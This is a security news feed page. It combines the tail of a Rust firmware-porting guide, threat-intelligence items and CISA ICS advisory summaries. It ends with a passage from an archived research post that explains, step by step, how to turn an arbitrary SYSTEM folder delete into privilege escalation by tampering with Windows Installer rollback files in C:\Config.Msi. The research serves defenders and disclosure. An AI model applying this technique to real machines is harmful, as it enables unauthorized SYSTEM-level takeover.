Note: Even when a library declares #![no_std] in its source, there is no guarantee that its dependencies don't depend on std. We recommend looking through the dependency tree to ensure that all dependencies support no_std, or testing whether the library compiles for a no_std target. The only way to know for certain is currently to try to compile the crate for a bare-metal target.
For example, one approach is to run cargo check with a bare-metal toolchain provided through rustup:
    $ rustup target add aarch64-unknown-none
    $ cargo check --target aarch64-unknown-none --no-default-features

Porting a std Library to no_std
If a library does not support no_std, it might still be possible to port it to a bare-metal environment, especially file format parsers and other OS-agnostic workloads. Higher-level functionality such as file handling, threading, and async code may present more of a challenge. In those cases, such functionality can be hidden behind feature flags to still provide the core functionality in a no_std build.
To port a std crate to no_std (core+alloc):
1. In the Cargo.toml file, add a std feature, then add this std feature to the default features.
2. Add the following lines to the top of lib.rs:
    #![no_std]
    #[cfg(feature = "std")]
    extern crate std;
    extern crate alloc;
3. Then, iteratively fix all occurring compiler errors as follows:
   - Move any use directives from std to either core or alloc.
   - Add use directives for all types that would otherwise automatically be imported by the std prelude, such as alloc::vec::Vec and alloc::string::String.
   - Hide anything that doesn't exist in core or alloc and cannot otherwise be supported in the no_std build (such as file system accesses) behind a #[cfg(feature = "std")] guard.
   - Anything that needs to interact with the embedded environment may need to be explicitly handled, such as functions for I/O. These likely need to be behind a #[cfg(not(feature = "std"))] guard.
   - Disable std for all dependencies (that is, change their definitions in Cargo.toml, if using Cargo).
This needs to be repeated for all dependencies within the crate dependency tree that do not support no_std yet.

Custom Target Architectures
There are a number of targets officially supported by the Rust compiler; however, many bare-metal targets are missing from that list. Thankfully, the Rust compiler lowers to LLVM IR and uses an internal copy of LLVM to lower to machine code. Thus, it can support any target architecture that LLVM supports by defining a custom target.
Defining a custom target requires a toolchain built with the channel set to dev or nightly. Rust's Embedonomicon has a wealth of information on this subject and should be referred to as the source of truth. To give a quick overview, a custom target JSON file can be constructed by finding a similar supported target and dumping the JSON representation:
    $ rustc --print target-list
    [...]
    armv7a-none-eabi
    [...]
    $ rustc -Z unstable-options --print target-spec-json --target armv7a-none-eabi
This will print out a target JSON that looks something like:
    $ rustc --print target-spec-json -Z unstable-options --target=armv7a-none-eabi
    {
      "abi": "eabi",
      "arch": "arm",
      "c-enum-min-bits": 8,
      "crt-objects-fallback": "false",
      "data-layout": "e-m:e-p:32:32-Fi8-i64:64-v128:64:128-a:0:32-n32-S64",
      [...]
    }
This output can provide a starting point for defining your target. Of particular note, the data-layout field is defined in the LLVM documentation.
Once the target is defined, libcore and liballoc (and libstd, if applicable) must be built from source for the newly defined target. If using Cargo, building with -Z build-std accomplishes this, indicating that these libraries should be built from source for your target along with your crate module:
    # set build-std to the list of libraries needed
    cargo build -Z build-std=core,alloc --target my_target.json

Building Rust With LLVM Prebuilts
If the bare-metal architecture is not supported by the LLVM bundled internal to the Rust toolchain, a custom Rust toolchain can be produced with any LLVM prebuilts that support the target.
The instructions for building a Rust toolchain can be found in detail in the Rust Compiler Developer Guide. In the config.toml, llvm-config must be set to the path of the LLVM prebuilts.
You can find the latest Rust toolchain supported by a particular version of LLVM by checking the release notes and looking for releases which bump up the minimum supported LLVM version. For example, Rust 1.76 bumped the minimum LLVM to 16 and 1.73 bumped the minimum LLVM to 15. That means with LLVM 15 prebuilts, the latest Rust toolchain that can be built is 1.75.

Creating a Drop-In Rust Shim
To create a drop-in replacement for the C/C++ function or API being replaced, the shim needs two things: it must provide the same API as the replaced library and it must know how to run in the firmware's bare-metal environment.

Exposing the Same API
The first is achieved by defining a Rust FFI interface with the same function signatures. We try to keep the amount of unsafe Rust as minimal as possible by putting the actual implementation in a safe function and exposing a thin wrapper around it.
For example, the FreeRTOS coreJSON example includes a JSON_Validate C function with the following signature:
    JSONStatus_t JSON_Validate( const char * buf, size_t max );
We can write a shim in Rust between it and the memory-safe serde_json crate to expose the C function signature. We try to keep the unsafe code to a minimum and call through to a safe function early:
    use core::ffi::c_char;
    use core::ptr::slice_from_raw_parts;
    use serde_json::Value;

    // JSONStatus and JSONStatus_t mirror coreJSON's JSONStatus_t enum and are
    // assumed to come from the Bindgen-generated bindings for its header.

    #[no_mangle]
    pub unsafe extern "C" fn JSON_Validate(buf: *const c_char, len: usize) -> JSONStatus_t {
        if buf.is_null() {
            JSONStatus::JSONNullParameter as _
        } else if len == 0 {
            JSONStatus::JSONBadParameter as _
        } else {
            json_validate(slice_from_raw_parts(buf as _, len).as_ref().unwrap()) as _
        }
    }

    // No more unsafe code in here.
    fn json_validate(buf: &[u8]) -> JSONStatus {
        if serde_json::from_slice::<Value>(buf).is_ok() {
            JSONStatus::JSONSuccess
        } else {
            // coreJSON reports a parse failure as JSONIllegalDocument.
            JSONStatus::JSONIllegalDocument
        }
    }
Note: This is a very simple example. For a highly resource-constrained target, you can avoid alloc and use serde_json_core, which has even lower overhead but requires pre-defining the JSON structure so it can be allocated on the stack.
For further details on how to create an FFI interface, the Rustonomicon covers this topic extensively.

Calling Back to C/C++ Code
In order for any Rust component to be functional within a C-based firmware, it will need to call back into the C code for things such as allocations or logging. Thankfully, there are a variety of tools available which automatically generate Rust FFI bindings to C. That way, C functions can easily be invoked from Rust.
The standard means of doing this is with the Bindgen tool. You can use Bindgen to parse all relevant C headers that define the functions Rust needs to call into. It's important to invoke Bindgen with the same CFLAGS as the code in question is built with, to ensure that the bindings are generated correctly.
Experimental support for producing bindings to static inline functions is also available.

Hooking Up the Firmware's Bare-Metal Environment
Next we need to hook up Rust panic handlers, global allocators, and critical section handlers to the existing code base. This requires producing definitions for each of these which call into the existing firmware C functions.
The Rust panic handler must be defined to handle unexpected states or failed assertions. A custom panic handler can be defined via the panic_handler attribute. This is specific to the target and should, in most cases, either point to an abort function for the current task/process, or a panic function provided by the environment.
If an allocator is available in the firmware and the crate relies on the alloc crate, the Rust allocator can be hooked up by defining a global allocator implementing GlobalAlloc.
If the crate in question relies on concurrency, critical sections will need to be handled. Rust's core and alloc crates do not directly provide a means for defining this; however, the critical_section crate is commonly used to handle this functionality for a number of architectures, and can be extended to support more.
It can be useful to hook up functions for logging as well. Simple wrappers around the firmware's existing logging functions can expose these to Rust and be used in place of print or eprint and the like. A convenient option is to implement the Log trait.

Fallible Allocations and alloc
Rust's alloc crate normally assumes that allocations are infallible (that is, memory allocations won't fail). However, due to memory constraints this isn't true in most bare-metal environments. Under normal circumstances Rust panics and/or aborts when an allocation fails; this may be acceptable behavior for some bare-metal environments, in which case there are no further considerations when using alloc.
If there's a clear justification or requirement for fallible allocations, however, additional effort is required to ensure that either allocations can't fail or that failures are handled. One approach is to use a crate that provides statically allocated fallible collections, such as the heapless crate, or dynamic fallible allocations like fallible_vec. Another is to exclusively use try_* methods such as Vec::try_reserve, which check whether the allocation is possible.
Rust is in the process of formalizing better support for fallible allocations, with an experimental allocator in nightly allowing failed allocations to be handled by the implementation. There is also the unstable cfg flag for alloc called no_global_oom_handling which removes the infallible methods, ensuring they are not used.

Build Optimizations
Building the Rust library with LTO is necessary to optimize for code size. The existing C/C++ code base does not need to be built with LTO when passing -C lto=true to rustc. Additionally, setting -C codegen-units=1 results in further optimizations in addition to reproducibility. If using Cargo to build, the following Cargo.toml settings are recommended to reduce the output library size:
    [profile.release]
    panic = "abort"
    lto = true
    codegen-units = 1
    strip = "symbols"
    # opt-level "z" may produce better results in some circumstances
    opt-level = "s"
Pass the -Z remap-cwd-prefix=. flag to rustc, or to Cargo via the RUSTFLAGS environment variable, to strip current-working-directory path strings from the output.
In terms of performance, Rust demonstrates similar performance to C. The most relevant example may be the Rust binder Linux kernel driver, which found “that Rust binder has similar performance to C binder”.
When linking LTO'd Rust staticlibs together with C/C++, it's recommended to ensure a single Rust staticlib ends up in the final linkage, otherwise there may be duplicate symbol errors when linking. This may mean combining multiple Rust shims into a single static library by re-exporting them from a wrapper module.

Memory Safety for Firmware, Today
Using the process outlined in this blog post, you can begin to introduce Rust into large legacy firmware code bases immediately. Replacing security-critical components with off-the-shelf open-source memory-safe implementations and developing new features in a memory-safe language will lead to fewer critical vulnerabilities while also providing an improved developer experience.
Special thanks to our colleagues who have supported and contributed to these efforts: Roger Piqueras Jover, Stephan Chen, Gil Cukierman, Andrew Walbran, and Erik Gilling
by Google Security Blog
2024-09-04 12:00:19
Malwarebytes review: Solid, free protection with a user-friendly interface
Malwarebytes offers both free and premium antivirus services to help protect your device. Here's what to know.
by ZDNET Security
2024-09-04 11:01:00
Hackers Use Fake GlobalProtect VPN Software in New WikiLoader Malware Attack
A new malware campaign is spoofing Palo Alto Networks' GlobalProtect VPN software to deliver a variant of the WikiLoader (aka WailingCrab) loader by means of a search engine optimization (SEO) campaign. The malvertising activity, observed in June 2024, is a departure from previously observed tactics wherein the malware has been propagated via traditional phishing emails, Unit 42 researchers
by The Hacker News
2024-09-04 11:00:00
Deepfake scams escalate, hitting more than half of businesses
The vast majority of corporate finance professionals, 85%, now view such scams as an "existential" threat, a Medius study found.
by Cybersecurity Dive
2024-09-04 11:00:00
Linux Ransomware Threats: How Attackers Target Linux Systems
Ransomware has evolved to target Linux systems. Learn about methods for infection and how to protect your IT environments from attacks.
by ITPro Today
2024-09-04 11:00:00
Zimperium Welcomes Shashank Pathak to Our Go-to-Market Team in India
As we continue to strengthen our presence in India and South Asia, we are excited to announce the appointment of Shashank Pathak to our Go-to-Market team. The post Zimperium Welcomes Shashank Pathak to Our Go-to-Market Team in India appeared first on Zimperium.
by Zimperium
2024-09-04 10:50:52
Prolific RansomHub engaged in attack spree, feds warn
The group has been among the most active threat groups of 2024, and is linked to a tool that can neutralize endpoint security.
by Cybersecurity Dive
2024-09-04 10:31:11
Microsoft is training developers on the intricacies of threat intelligence
Cybercrime wonk Sherrod DeGrippo is taking Microsoft's software developers and engineers on a journey into her world, the depths of threat intelligence.
by Cybersecurity Dive
2024-09-04 10:00:02
Mallox ransomware: in-depth analysis and evolution
In this report, we provide an in-depth analysis of the Mallox ransomware, its evolution, ransom strategy, encryption scheme, etc.
by Securelist
2024-09-04 08:04:39
FudModule Rootkit Targets Crypto, Linked to North Korean Citrine Sleet Group

Key Takeaways

* A North Korean threat actor, Citrine Sleet, has been observed exploiting a zero-day vulnerability in Chromium, designated as CVE-2024-7971, to achieve Remote Code Execution (RCE).
* Citrine Sleet, also tracked by other security firms under the names AppleJeus, Labyrinth Chollima, UNC4736, and Hidden Cobra, is attributed to Bureau 121 of North Korea's Reconnaissance General Bureau.
* The group primarily focuses on financial institutions, especially those involved with cryptocurrency, aiming for financial gain.
* The group's tactics, techniques, and procedures (TTPs) have now been linked to the FudModule rootkit, which has also been associated with Diamond Sleet, another North Korean threat actor.
* Citrine Sleet creates fraudulent websites that mimic legitimate cryptocurrency trading platforms to distribute fake job applications or entice targets into downloading a compromised cryptocurrency wallet or trading application.
* The threat actor typically infects targets with its custom trojan malware, AppleJeus, designed to gather information necessary to take control of victims' cryptocurrency assets.

Overview

The Citrine Sleet threat actor group was observed by Microsoft researchers exploiting the CVE-2024-7971 zero-day vulnerability in the V8 JavaScript and WebAssembly engine, which affects versions of Chromium prior to 128.0.6613.84. By exploiting this vulnerability, the attackers achieved remote code execution (RCE) within the sandboxed Chromium renderer process. Google has since released a patch for the vulnerability, on August 21, 2024, and users are advised to update to the latest version of Chromium to mitigate the risk.

Technical Analysis

The observed attack chain involved a typical browser exploit sequence, starting with targets being directed to a Citrine Sleet-controlled exploit domain, voyagorclub[.]space, through common social engineering tactics. Once the users were connected, the zero-day RCE exploit for CVE-2024-7971 was deployed, allowing the attackers to download and load shellcode containing a Windows sandbox escape exploit and the FudModule rootkit into memory.

FudModule is an advanced rootkit malware designed to target kernel access while avoiding detection. Threat actors have been seen using the FudModule data-only rootkit to gain admin-to-kernel access on Windows-based systems, enabling read/write primitive operations and conducting Direct Kernel Object Manipulation (DKOM).

The attack chain seen in Citrine Sleet's zero-day exploit of CVE-2024-7971 closely mirrors the chain observed by Avast, which involves a variant of FudModule known as "FudModule 2.0." This variant includes malicious loaders and a late-stage remote access trojan (RAT). The research identified the previously unknown Kaolin RAT as the malware responsible for deploying the FudModule rootkit on targeted devices.

Conclusion and Recommendations

CVE-2024-7971 is the third vulnerability this year that North Korean threat actors have exploited to deploy the FudModule rootkit, following CVE-2024-21338 and CVE-2024-38193. To address zero-day exploits effectively, it is crucial not only to keep systems updated but also to use security solutions that offer comprehensive visibility across the cyberattack chain to detect and block attacker tools and malicious activities after exploitation.

To mitigate the risks posed by Citrine Sleet and similar threats, the following best practices are recommended:

* Activate the automatic software update function on your computer, mobile device, and any other linked devices when feasible and practical.
* Employ a trusted antivirus solution and internet security software suite on all connected devices, such as your PC, laptop, and mobile phone.
* Conduct consistent vulnerability assessments to maintain proactive security.
* Always use multi-factor authentication on accounts to lessen the risk of takeover.
The post FudModule Rootkit Targets Crypto, Linked to North Korean Citrine Sleet Group appeared first on Cyble.
by CYBLE
2024-09-04 07:57:00
Why SMEs need to change their perspective on cybersecurity

A recent report from the World Economic Forum explored how small and medium-sized enterprises (SMEs) can turn cybersecurity risk into an opportunity. We recently wrote about why securing small businesses is good for everyone – protecting third party providers at every level of a supply chain in order to enable a better overall security posture for every organisation in that chain. And we're not alone in renewing our focus on the importance of security for SMEs; because as Akhilesh Tuteja (Global Cyber Security Leader at KPMG) noted in that World Economic Forum report, "the size of an enterprise no longer dictates its vulnerability to cyber threats." Threat actors are targeting smaller businesses, identifying them as weak links that offer easy entry points into a network.

What can SMEs do to improve their security and become small but strong links in global supply chains?

SMEs must see cybersecurity as a business problem – not just a tech problem

Small enterprises don't have the same access to resources that larger organisations have. And because of this, they tend to focus on what's immediately, obviously important (namely, sales and profit margins), and silo other aspects of business operations into small pots that sit much lower on their list of priorities. Cybersecurity is one of those aspects that gets compartmentalised and often neglected. Technical security systems are set up, and then forgotten about – with SMEs less likely to integrate security practices across their operations in an ongoing, dynamic way.

This is a mistake. SMEs must change their perspective and start thinking about cybersecurity not as a technology problem, but as a business problem.

"While understanding the technology that powers business is very important, understanding the risks it brings to business is far more important," wrote Tuteja. "Unlike larger enterprises that can apply a higher degree of control across the enterprise, SMEs must identify areas of relevance and create a cyber strategy for different units, data types and systems. They should also explore more mature technologies, such as cloud computing, instead of spending time trying to build, manage and maintain their own systems."

When you integrate cybersecurity into your business strategy it creates opportunities for growth

Instead of seeing cybersecurity as a risk alone, Tuteja urged small and medium enterprises to see it as an opportunity – with a good security strategy at the heart of an overall growth strategy. Why? Because customers, both in B2C and B2B markets, value trust. And they're more likely to trust a small business if it can clearly demonstrate and explain the security protocols and practices it uses to keep customer information safe.

When we interviewed Abeer Khedr (CISO at National Bank of Egypt) for the BHMEA blog, she said that the inequity between larger cyber resilient organisations, and smaller less resilient ones, will continue to increase. "This is a cause of concern because the less resilient companies could be our suppliers, our customers; it's one ecosystem. This should drive our efforts in 2024 to increase awareness and support these companies on how to apply security measures and develop incident response capabilities to increase their cyber resilience."

Cybersecurity can't be an afterthought for SMEs – and the cybersecurity sector needs to offer opportunities for small business leaders to understand the inextricable nature of business strategy and security, and develop security practices that facilitate high growth with low risk.

P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!
by HACKLIDO
2024-09-04 07:41:52
CISA Warns of Critical ICS Vulnerabilities in Rockwell and Delta Electronics

Key Takeaways

* CISA Alert: CISA warns of critical ICS vulnerabilities in Rockwell Automation and Delta Electronics products.
* ThinManager ThinServer: Flaws in Rockwell Automation's ThinManager ThinServer (versions 11.1.0 to 13.2.1) could allow system-level code execution. Affected sector: Manufacturing.
* Delta DTN Soft: Vulnerability in Delta's DTN Soft (version 2.0.1 and prior) enables remote code execution. Update to version 2.1. Affected sector: Energy.
* FactoryTalk View SE: A flaw in Rockwell Automation's FactoryTalk View SE 13.0 allows unauthorized file modifications. Affected sectors: Chemical, Energy, and others.
* Mitigation: CISA advises minimizing ICS exposure, securing remote access, updating software, and implementing layered security measures.

Overview

On August 29, the Cybersecurity and Infrastructure Security Agency (CISA) released three advisories to warn users and administrators of several critical vulnerabilities affecting industrial control systems (ICS) from prominent vendors. Advisory ICSA-24-242-01 addresses vulnerabilities in Rockwell Automation ThinManager ThinServer. ICSA-24-242-02 covers a vulnerability in Delta Electronics DTN Soft. ICSA-24-226-06 advises users about a vulnerability in Rockwell Automation FactoryTalk View Site Edition (Update A).

Cyble's ICS vulnerabilities report last week looked at additional vulnerabilities in Rockwell and other ICS products, plus general recommendations for controlling risk in ICS networks.

Rockwell Automation ThinManager ThinServer Vulnerabilities

The first set of vulnerabilities, disclosed in ICSA-24-242-01, affects multiple versions of Rockwell Automation's ThinManager ThinServer software, a client management tool. The flaws, which include improper privilege management, incorrect permission assignment, and improper input validation, could allow attackers to read arbitrary files and execute code with system-level privileges. The affected versions of ThinManager ThinServer range from 11.1.0 to 13.2.1. CISA has assigned three CVE identifiers to these flaws: CVE-2024-7986, CVE-2024-7987, and CVE-2024-7988. The CVSS v4 scores for these vulnerabilities range from 6.8 to 9.3, indicating a high-to-critical level of risk.

Critical Infrastructure Sector Impacted: Manufacturing.

Delta Electronics DTN Soft Vulnerability

The second advisory, ICSA-24-242-02, focuses on a vulnerability in Delta Electronics' DTN Soft temperature control software. The flaw, a deserialization of untrusted data issue (CWE-502), could allow an attacker to achieve remote code execution. The vulnerability affects DTN Soft version 2.0.1 and prior. CISA has assigned CVE-2024-8255 to this flaw, with a CVSS v4 score of 8.4. Delta Electronics recommends updating to the latest version, 2.1, to mitigate this vulnerability.

Critical Infrastructure Sector Impacted: Energy.

Rockwell Automation FactoryTalk View Site Edition Vulnerability

The third advisory, ICSA-24-226-06, covers a vulnerability in Rockwell Automation's FactoryTalk View Site Edition, an HMI application. The flaw, an incorrect permission assignment for a critical resource (CWE-732), could allow any user to edit or replace files executed with elevated permissions. The affected version is FactoryTalk View SE 13.0. CISA has assigned CVE-2024-7513 to this vulnerability, with a CVSS v4 score of 8.5. Rockwell Automation recommends updating to a newer version of FactoryTalk to mitigate this vulnerability.

Critical Infrastructure Sector Impacted: Chemical; Commercial Facilities; Energy; Government Facilities; Manufacturing; Water and Wastewater Systems.

CISA Mitigation Advice

Based on the CISA advisories for the three industrial control system (ICS) vulnerabilities, the following general recommendations and mitigations are provided:

1. Minimize Network Exposure:
   * Ensure that ICS devices and systems are not accessible from the internet.
   * Limit access to ICS devices and systems to only those who need it.
   * Use firewalls and other network segmentation techniques to isolate ICS networks from business networks.
2. Implement Secure Remote Access Methods:
   * Use Virtual Private Networks (VPNs) to establish secure remote connections.
   * Regularly update VPN software and configurations to ensure they are secure.
   * Consider using other secure remote access methods, such as SSH or HTTPS.
3. Perform Regular Software Updates:
   * Regularly update ICS software to the latest versions to ensure you have the latest security patches and fixes.
   * Use automated update mechanisms and monitoring to stay up-to-date.
4. Implement Security Best Practices:
   * Use strong passwords and password policies to prevent unauthorized access.
   * Implement access controls, such as role-based access control (RBAC) and least privilege access.
   * Regularly audit and monitor ICS systems for suspicious activity.
5. Perform Impact Analysis and Risk Assessment:
   * Regularly assess the potential impact of security incidents on your ICS systems.
   * Develop and implement incident response plans to mitigate the effects of a security incident.
6. Use Secure Protocols and Communications:
   * Use secure communication protocols, such as HTTPS and SSH, to protect data in transit.
   * Regularly update and patch communication protocols to ensure they are secure.
7. Implement Defense-in-Depth Strategies:
   * Implement multiple layers of security controls to prevent and detect security incidents.
   * Use a combination of technical and procedural controls to protect ICS systems.
8. Monitor for Suspicious Activity:
   * Regularly monitor ICS systems and networks for suspicious activity.
   * Implement intrusion detection and prevention systems to detect and prevent security incidents.

The post CISA Warns of Critical ICS Vulnerabilities in Rockwell and Delta Electronics appeared first on Cyble.
by CYBLE
2024-09-04 05:00:00
The Japanese Robot Controversy Lurking in Israel's Military Supply Chain
Activists claim Japanese industrial robots are being used to build military equipment for Israel. The robot maker denies the claims, but the episode reveals the complex ethics of global manufacturing.
by WIRED Security News
2024-09-03 23:59:00
Last Week in Security (LWiS) - 2024-09-03
argv[0] tampering (@Wietze), Moodle eval() misuse (@RedTeamPT), ntoskrnl.exe PoC (@b1thvn_), 4x wappd exploits (@hyprdude), and more!
by Bad Sector Labs
2024-09-03 22:39:06
California Approves Privacy Bill Requiring Opt-Out Tools
This bill requires Web browsers to have an easy-to-find (and use) setting for consumers to send an opt-out preference signal by default to every site and app they interact with.
by Dark Reading
2024-09-03 21:33:14
North Korea's 'Citrine Sleet' APT Exploits Zero-Day Chromium Bug
Microsoft warned that the DPRK's latest innovative tack chains together previously unknown browser issues, then adds a rootkit to the mix to gain deep system access and steal crypto.
by Dark Reading
2024-09-03 21:18:49
City of Columbus Sues Researcher After Ransomware Attack
The Ohio city filed for a restraining order, claiming the researcher was working in tandem with the ransomware attackers.
by Dark Reading
2024-09-03 20:37:20
Halliburton Data Stolen in Oil-Sector Cyberattack
The energy kahuna said that operations were disrupted after an attack on its supporting business applications.
by ITPro Today
2024-09-03 20:23:00
Infostealers: A growing threat
One sign of the increasing maturity of the cybercriminal economy is the fast-growing use of infostealers, a category of malware that, as its name suggests, is designed to gather and exfiltrate information from your system.
by Barracuda
2024-09-03 20:21:22
Mitigating insider threats requires constant vigilance
Insider threats are among the most challenging issues any cybersecurity team is likely to encounter. The only way to prevent these types of attacks is to ensure that data access is continuously monitored.
by Barracuda
2024-09-03 19:21:00
U.S. Cyber Command Hosts First Offensive Cyber Flag 2024 Exercise
U.S. Cyber Command has concluded CYBER FLAG 24-2, marking a significant milestone as the first iteration of the exercise to incorporate Offensive Cyberspace Operations, August 30.
by U.S. Cyber Command News
2024-09-03 19:16:55
How to Secure Your Penetration Testing Environment with Full Disk Encryption
by Douglas Berdeaux, Senior Security Consultant. As penetration testers, ensuring the security and integrity of our tools and data is paramount. One key aspect of this is creating a […]
by Red Siege Blog
2024-09-03 19:16:46
🐝 Hive Five 187 - Hacker Mode
A roundup of every Hacker Summer Camp AI Talk, Bypassing airport security via SQL injection, Misconception about the nature of work, and more...
by Hive Five
2024-09-03 18:59:00
Hacktivists Exploits WinRAR Vulnerability in Attacks Against Russia and Belarus
A hacktivist group known as Head Mare has been linked to cyber attacks that exclusively target organizations located in Russia and Belarus. "Head Mare uses more up-to-date methods for obtaining initial access," Kaspersky said in a Monday analysis of the group's tactics and tools. "For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which
by The Hacker News
2024-09-03 18:46:10
Organizations in the Middle East Targeted By Malware Impersonating Palo Alto GlobalProtect VPN
A social engineering campaign is targeting entities in the Middle East using malware that impersonates Palo Alto Networks' GlobalProtect VPN, according to researchers at Trend Micro.
by KnowBe4
2024-09-03 18:46:07
Major Scam Operation Uses Deepfake Videos
Researchers at Palo Alto Networks' Unit 42 are tracking dozens of scam campaigns that are using deepfake videos to impersonate CEOs, news anchors, and high-profile government officials.
by KnowBe4
2024-09-03 18:46:00
New Rust-Based Ransomware Cicada3301 Targets Windows and Linux Systems
Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation. "It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity
by The Hacker News
2024-09-03 18:25:06
Cyberattackers Spoof Palo Alto VPNs to Spread WikiLoader Variant
The malware, first discovered two years ago, has returned in campaigns using SEO poisoning.
by Dark Reading
2024-09-03 18:18:41
Transatlantic Cable podcast episode 361 | Kaspersky official blog
Episode 361 looks at the right to disconnect, Black Myth: Wukong and much more!
by Kaspersky
2024-09-03 16:54:45
DAST Best Practices for Mobile Developers
This blog post will guide you through the essential best practices for integrating DAST into your mobile development process. The post DAST Best Practices for Mobile Developers appeared first on Zimperium.
by Zimperium
2024-09-03 16:38:36
London's city transport hit by cybersecurity incident
Transport for London (TfL) is apparently fighting a cybersecurity incident but is rather sparing in providing details.
by Malwarebytes Labs
2024-09-03 16:09:05
Halliburton Data Stolen in Oil-Sector Cyberattack
The energy kahuna said that operations were disrupted after an attack on its supporting business applications.
by Dark Reading
2024-09-03 16:08:03
Evolving npm Package Campaign Targets Roblox Devs, for Years
Attackers have added aggressive social engineering to their arsenal, along with a novel Windows-manipulating persistence mechanism that demands developer vigilance.
by Dark Reading
2024-09-03 15:51:07
Abusing Arbitrary File Deletes to Escalate Privilege and Other Great Tricks (Archive)

This version of the blog is preserved for archival purposes only. An updated version of this blog, including links to new PoC code, can be found here.

What do you do when you've found an arbitrary file delete as NT AUTHORITY\SYSTEM? Probably just sigh and call it a DoS. Well, no more. In this article, we'll show you some great techniques for getting much more out of your arbitrary file deletes, arbitrary folder deletes, and other seemingly low-impact filesystem-based exploit primitives.

The Trouble with Arbitrary File Deletes

When you consider how to leverage an arbitrary file delete on Windows, two great obstacles present themselves:

* Most critical Windows OS files are locked down with DACLs that prevent modification even by SYSTEM. Instead, most OS files are owned by TrustedInstaller, and only that account has permission to modify them. (Exercise for the reader: Find the critical Windows OS files that can still be deleted or overwritten by SYSTEM!)
* Even if you find a file that you can delete as SYSTEM, it needs to be something that causes a "fail-open" (degradation of security) if deleted.

A third problem that can arise is that some critical system files are inaccessible at all times due to sharing violations.

Experience shows that finding a file to delete that meets all the above criteria is very hard. When looking in the usual places, which would be within C:\Windows, C:\Program Files or C:\Program Data, we're not aware of anything that fits the bill. There is some prior work that involves exploiting antivirus and other products, but this is dependent on vulnerable behavior in those products.

The Solution is Found Elsewhere: Windows Installer

In March of 2021, we received a vulnerability report from researcher Abdelhamid Naceri (halov). The vulnerability he reported was an arbitrary file delete in the User Profile service, running as SYSTEM. Remarkably, his submission also included a technique to parlay this file delete into an escalation of privilege (EoP), resulting in a command prompt running as SYSTEM. The EoP works by deleting a file, but not in any of the locations you would usually think of.

To understand the route to privilege escalation, we need to explain a bit about the operation of the Windows Installer service. The following explanation is simplified somewhat.

The Windows Installer service is responsible for performing installations of applications. An application author supplies an .msi file, which is a database defining the changes that must be made to install the application: folders to be created, files to be copied, registry keys to be modified, custom actions to be executed, and so forth. To ensure that system integrity is maintained when an installation cannot be completed, and to make it possible to revert an installation cleanly, the Windows Installer service enforces transactionality. Each time it makes a change to the system, Windows Installer makes a record of the change, and each time it overwrites an existing file on the system with a newer version from the package being installed, it retains a copy of the older version. In case the install needs to be rolled back, these records allow the Windows Installer service to restore the system to its original state.

In the simplest scenario, the location for these records is a folder named C:\Config.Msi. During an installation, the Windows Installer service creates a folder named C:\Config.Msi and populates it with rollback information. Whenever the install process makes a change to the system, Windows Installer records the change in a file of type .rbs (rollback script) within C:\Config.Msi. Additionally, whenever the install overwrites an older version of some file with a newer version, Windows Installer will place a copy of the original file within C:\Config.Msi. This type of file will be given the .rbf (rollback file) extension. In case an incomplete install needs to be rolled back, the service will read the .rbs and .rbf files and use them to revert the system to the state that existed before the install.

This mechanism must be protected against tampering. If a malicious user were able to alter the .rbs and/or .rbf files before they are read, arbitrary changes to the state of the system could occur during rollback. Therefore, Windows Installer sets a strong DACL on C:\Config.Msi and the enclosed files.

Here is where an opening arises, though: What if an attacker has an arbitrary folder delete vulnerability? They can use it to completely remove C:\Config.Msi immediately after Windows Installer creates it. The attacker can then recreate C:\Config.Msi with a weak DACL (note that ordinary users are allowed to create folders at the root of C:\). Once Windows Installer creates its rollback files within C:\Config.Msi, the attacker will be able to replace C:\Config.Msi with a fraudulent version that contains attacker-specified .rbs and .rbf files. Then, upon rollback, Windows Installer will make arbitrary changes to the system, as specified in the malicious rollback scripts.

Note that the only required exploit primitive here is the ability to delete an empty folder. Moving or renaming the folder works equally well.

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

In conjunction with this article, we are releasing source code for Abdelhamid Naceri's privilege escalation technique. This exploit has wide applicability in cases where you have a primitive for deleting, moving, or renaming an arbitrary empty folder in the context of SYSTEM or an administrator.

The exploit should be built in the Release configuration for either x64 or x86 to match the architecture of the target system. Upon running the exploit, it will prompt you to initiate a delete of C:\Config.Msi. You can do this by triggering an arbitrary folder delete vulnerability, or, for testing purposes, you can simply run rmdir C:\Config.Msi from an elevated command prompt. Upon a successful run, the exploit will drop a file to C:\Program Files\Common Files\microsoft shared\ink\HID.DLL. You can then get a SYSTEM command prompt by starting the On-Screen Keyboard osk.exe and then switching to the Secure Desktop, for example by pressing Ctrl-Alt-Delete.

The exploit contains an .msi file. The main thing that's special about this .msi is that it contains two custom actions: one that produces a short delay, and a second that throws an error. When the Windows Installer service tries to install this .msi, the installation will halt midway and rollback. By the time the rollback begins, the exploit will have replaced the contents of C:\Config.Msi with a malicious .rbs and .rbf. The .rbf contains the bits of the malicious HID.DLL, and the .rbs instructs Windows Installer to "restore" it to our desired location (C:\Program Files\Common Files\microsoft shared\ink\).

The full mechanism of the EoP exploit is as follows:

1. The EoP creates a dummy C:\Config.Msi and sets an oplock.
2. The attacker triggers the folder delete vulnerability to delete C:\Config.Msi (or move C:\Config.Msi elsewhere) in the context of SYSTEM (or admin). Due to the oplock, the SYSTEM process is forced to wait.
3. Within the EoP, the oplock callback is invoked. The following several steps take place within the callback.
4. The EoP moves the dummy C:\Config.Msi elsewhere. This is done so that the oplock remains in place and the vulnerable process is forced to continue waiting, while the filesystem location C:\Config.Msi becomes available for other purposes (see further).
5. The EoP spawns a new thread that invokes the Windows Installer service to install the .msi, with UI disabled.
6. The callback thread of the EoP continues and begins polling for the existence of C:\Config.Msi. For reasons that are not clear to me, Windows Installer will create C:\Config.Msi, use it briefly for a temp file, delete it, and then create it a second time to use for rollback scripts. The callback thread polls C:\Config.Msi to wait for each of these actions to take place.
7. As soon as the EoP detects that Windows Installer has created C:\Config.Msi for the second time, the callback thread exits, releasing the oplock. This allows the vulnerable process to proceed and delete (or move, or rename) the C:\Config.Msi created by Windows Installer.
